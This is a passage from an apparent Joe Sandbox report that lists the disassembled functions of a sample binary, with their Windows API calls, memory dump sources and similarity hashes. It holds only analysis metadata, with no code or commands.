                                                                          • Instruction Fuzzy Hash: B6D01770910B22CFDB229F75D808B87B6E9AF05352F128C7FD486D2160EAB1DC90CB90
                                                                          Function 003890E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00388CF4,?,0039F910), ref: 003890EE
                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00389100
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                          • API String ID: 2574300362-199464113
                                                                          • Opcode ID: 77501c73cd5fa66fc16c308b00e2eb3f06404c3f74497a5edd8e3e52461fed21
                                                                          • Instruction ID: 1422f994483de4125dee5ef3f46eeb2ed95d1c138ef3a8cf1cc8b38f83105d51
                                                                          • Opcode Fuzzy Hash: 77501c73cd5fa66fc16c308b00e2eb3f06404c3f74497a5edd8e3e52461fed21
                                                                          • Instruction Fuzzy Hash: 5AD01734614723CFDB22AF32E81C65676E8AF05351F17887FD486D65A0EB71C880CB90
                                                                          Function 00351714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: LocalTime__swprintf
                                                                          • String ID: %.3d$WIN_XPe
                                                                          • API String ID: 2070861257-2409531811
                                                                          • Opcode ID: d87ef9e9481d1d4b024e882d06aad48b3b67dedabfd4e0ec913a66e24f40d5fe
                                                                          • Instruction ID: cf176dca4fc69d12ee814d507d84fe972d9f8cca6b7abd9401ffd2027c8690df
                                                                          • Opcode Fuzzy Hash: d87ef9e9481d1d4b024e882d06aad48b3b67dedabfd4e0ec913a66e24f40d5fe
                                                                          • Instruction Fuzzy Hash: 01D01772844108FACB079B9598C9EF9777CAB0C302F142462F806E2460E2628B98EA21
                                                                          Function 0036717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b5510f96530f895204369ca289b9ceac80dc43e3bb8af4889000fdcbd991c7d7
                                                                          • Instruction ID: de181a93e00f2708cf22bb9c88bad3ab7e850f4e9217c373baf2c21e372870b2
                                                                          • Opcode Fuzzy Hash: b5510f96530f895204369ca289b9ceac80dc43e3bb8af4889000fdcbd991c7d7
                                                                          • Instruction Fuzzy Hash: B2C19174A04216EFCB16CFA5C884EAEBBB5FF48308B658598E805DB355DB30DD81DB90
                                                                          Function 0038E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?), ref: 0038E0BE
                                                                          • CharLowerBuffW.USER32(?,?), ref: 0038E101
                                                                            • Part of subcall function 0038D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0038D7C5
                                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0038E301
                                                                          • _memmove.LIBCMT ref: 0038E314
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                                          • String ID:
                                                                          • API String ID: 3659485706-0
                                                                          • Opcode ID: 84c12c38cd8c514b73777efbd9051053434a302098d8c66d9977fee7eb0caed8
                                                                          • Instruction ID: 163ba3842edad16346d66928d837fb30858f5eb31fc55be4dbfcd1077abb60ca
                                                                          • Opcode Fuzzy Hash: 84c12c38cd8c514b73777efbd9051053434a302098d8c66d9977fee7eb0caed8
                                                                          • Instruction Fuzzy Hash: 1FC15B75608301DFC706EF28C490A6ABBE4FF89714F1489AEF8999B351D731E946CB81
                                                                          Function 00388093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 003880C3
                                                                          • CoUninitialize.OLE32 ref: 003880CE
                                                                            • Part of subcall function 0036D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0036D5D4
                                                                          • VariantInit.OLEAUT32(?), ref: 003880D9
                                                                          • VariantClear.OLEAUT32(?), ref: 003883AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                          • String ID:
                                                                          • API String ID: 780911581-0
                                                                          • Opcode ID: bc07edded1db655c6ef0dabfe9eaf9bc72cc1ecbf14cd029de0423ec23f9eb10
                                                                          • Instruction ID: d0ba9f9c98c5b3aebdc79eb8124eb10fec527cf5afd24a3d399d2abd55549856
                                                                          • Opcode Fuzzy Hash: bc07edded1db655c6ef0dabfe9eaf9bc72cc1ecbf14cd029de0423ec23f9eb10
                                                                          • Instruction Fuzzy Hash: 2FA18C396047019FCB16EF24C491B6AB7E4BF8D314F544859F99A9B3A1CB70ED41CB42
                                                                          Function 0036687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                          • String ID:
                                                                          • API String ID: 2808897238-0
                                                                          • Opcode ID: cc3c15973692844e9f4a5ca237ba3e7f36ea190e5f0f11334aff364cb30a8736
                                                                          • Instruction ID: a8d9bf1be9962c10f904f83eec6d2c8f56e8b825021c5d332981d13daaa54639
                                                                          • Opcode Fuzzy Hash: cc3c15973692844e9f4a5ca237ba3e7f36ea190e5f0f11334aff364cb30a8736
                                                                          • Instruction Fuzzy Hash: 0D51EB747043419ECF26AFA5D893A7EB3E9AF45350F20C81FE586DB695DB70D8808701
                                                                          Function 003997F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(0114F320,?), ref: 00399863
                                                                          • ScreenToClient.USER32(00000002,00000002), ref: 00399896
                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00399903
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientMoveRectScreen
                                                                          • String ID:
                                                                          • API String ID: 3880355969-0
                                                                          • Opcode ID: 88e7611d52f47a8b6c01e4f3ed019a34cb47d2ab8ca267a156bf2566fd42d098
                                                                          • Instruction ID: b29d904a38b15a3e680f7b8ea28a8fc581668f601f35c64312525f7e3028d12e
                                                                          • Opcode Fuzzy Hash: 88e7611d52f47a8b6c01e4f3ed019a34cb47d2ab8ca267a156bf2566fd42d098
                                                                          • Instruction Fuzzy Hash: 0F516034A00209EFDF12DF68D980AAE7BB5FF45360F15815EF8659B2A0D731AD81CB90
                                                                          Function 00369A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00369AD2
                                                                          • __itow.LIBCMT ref: 00369B03
                                                                            • Part of subcall function 00369D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00369DBE
                                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00369B6C
                                                                          • __itow.LIBCMT ref: 00369BC3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$__itow
                                                                          • String ID:
                                                                          • API String ID: 3379773720-0
                                                                          • Opcode ID: 958ede3aaa2d9da2ec8072668ce0f3213aa695802e3a45f2c42aca5a0fb7c412
                                                                          • Instruction ID: 00d2d7e026d29d5d9afd0f4dbef26f9e0d30f4efb19fd0e5e1c9541da821b9c2
                                                                          • Opcode Fuzzy Hash: 958ede3aaa2d9da2ec8072668ce0f3213aa695802e3a45f2c42aca5a0fb7c412
                                                                          • Instruction Fuzzy Hash: AE415174A00208ABDF16EF54D845BFE7BBDEF48750F04406AF905AB291DB709E84CBA1
                                                                          Function 003869AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 003869D1
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003869E1
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00386A45
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00386A51
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                                          • String ID:
                                                                          • API String ID: 2214342067-0
                                                                          • Opcode ID: 63042ab80adde3c806099ccf0630d1376f705a12a21fd145ce525f019f024d0e
                                                                          • Instruction ID: 359607e732fbabeed75c1b547814f5181129ea620b25c55d514a4528083b861a
                                                                          • Opcode Fuzzy Hash: 63042ab80adde3c806099ccf0630d1376f705a12a21fd145ce525f019f024d0e
                                                                          • Instruction Fuzzy Hash: 2741B1756003006FEB6ABF24DC97FBA77E89F09B10F048059FA19AF2C2DA759D418791
                                                                          Function 0038641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0039F910), ref: 003864A7
                                                                          • _strlen.LIBCMT ref: 003864D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _strlen
                                                                          • String ID:
                                                                          • API String ID: 4218353326-0
                                                                          • Opcode ID: cd07a601b0bd0518e3284a3db4888afb3b4e5258dcb80b638be2acbc2ffd2a1e
                                                                          • Instruction ID: 19a2819917e189a0b24aeae9c4cc9ce43e70c217ad7663b431ad1d8803979bf9
                                                                          • Opcode Fuzzy Hash: cd07a601b0bd0518e3284a3db4888afb3b4e5258dcb80b638be2acbc2ffd2a1e
                                                                          • Instruction Fuzzy Hash: D141A431A04204AFCB16FBA4DC96FEEB7A9AF49310F148195F8159B292DB30ED44C750
                                                                          Function 0037B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0037B89E
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0037B8C4
                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0037B8E9
                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0037B915
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 3321077145-0
                                                                          • Opcode ID: 3c9d726011825da322d3772f4610aca6ff6e1ed7b471348afc8ffd223433486b
                                                                          • Instruction ID: 9a15a4bdbe577355bd3f975f9fcaa0f5a09d3e1e05ed19a526ec1ea3f3e12a4e
                                                                          • Opcode Fuzzy Hash: 3c9d726011825da322d3772f4610aca6ff6e1ed7b471348afc8ffd223433486b
                                                                          • Instruction Fuzzy Hash: 85410339600610DFCB26EF15C494A99BBE5AF4E310F098099ED4AAF362CB35ED41CB91
                                                                          Function 00398851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003988DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 634782764-0
                                                                          • Opcode ID: 404bba8d86868a8cbc3a97f6310f8ba5a4900999229d817af73dac19e3b83bb5
                                                                          • Instruction ID: 12455009a6a2011ce91283b050e929926a226f5dba57a13b700e4f1a84c2fcf6
                                                                          • Opcode Fuzzy Hash: 404bba8d86868a8cbc3a97f6310f8ba5a4900999229d817af73dac19e3b83bb5
                                                                          • Instruction Fuzzy Hash: 30310234604108BFEF239F28DC45FB977A8EB8B310F950416FA15E62A1CF31EA409B52
                                                                          Function 0039AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ClientToScreen.USER32(?,?), ref: 0039AB60
                                                                          • GetWindowRect.USER32(?,?), ref: 0039ABD6
                                                                          • PtInRect.USER32(?,?,0039C014), ref: 0039ABE6
                                                                          • MessageBeep.USER32(00000000), ref: 0039AC57
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1352109105-0
                                                                          • Opcode ID: c317a4461a868d3d2ddd39cb647a71f759289d6f6a7c71f625aa035b39fca9f4
                                                                          • Instruction ID: 885778efdeb490e200a99af1eef54cd58f2c46c3c8c379c3e7f2fb344bddd6a8
                                                                          • Opcode Fuzzy Hash: c317a4461a868d3d2ddd39cb647a71f759289d6f6a7c71f625aa035b39fca9f4
                                                                          • Instruction Fuzzy Hash: 23415B30A00A199FCF13DF58D884A697BF9FB49310F1982AAE815DF264D731E941DF92
                                                                          Function 00370AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00370B27
                                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00370B43
                                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00370BA9
                                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00370BFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          • Opcode ID: 4299d903eb7267bd191d93c5240224c1b03a69b8ad880c3a783b48e8b0ccccc9
                                                                          • Instruction ID: a5bb9de6005dd319da1d8fee064051aefb679404a15a03a3ec50655a13bfd59e
                                                                          • Opcode Fuzzy Hash: 4299d903eb7267bd191d93c5240224c1b03a69b8ad880c3a783b48e8b0ccccc9
                                                                          • Instruction Fuzzy Hash: 46312870940218EEFF3B8B25CC05BFABBAAAB45318F05C25AE499962D1C37DCA449751
                                                                          Function 00370C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00370C66
                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00370C82
                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00370CE1
                                                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00370D33
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          • Opcode ID: 0418d0571e347e351fe7c8a5380439b8311d385e6c7aa659de3566ae908c45b0
                                                                          • Instruction ID: 46338e417aad8e856324411799988729ebf647e4508e2e36d993604601c593b7
                                                                          • Opcode Fuzzy Hash: 0418d0571e347e351fe7c8a5380439b8311d385e6c7aa659de3566ae908c45b0
                                                                          • Instruction Fuzzy Hash: DB314830940309EEFF3B8A6588047FEBB6AAB45310F05C36BE498AA1D1C37D9D458751
                                                                          Function 003461C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003461FB
                                                                          • __isleadbyte_l.LIBCMT ref: 00346229
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00346257
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0034628D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: 6542adfa8a675471e7f67f0c9ee1a71446bc02da26cfba2a8500c8820897f4d5
                                                                          • Instruction ID: 40802dff0b4a6b4db9fb3ee2f18652b1bf6cae311bc83083695b2a687f716eba
                                                                          • Opcode Fuzzy Hash: 6542adfa8a675471e7f67f0c9ee1a71446bc02da26cfba2a8500c8820897f4d5
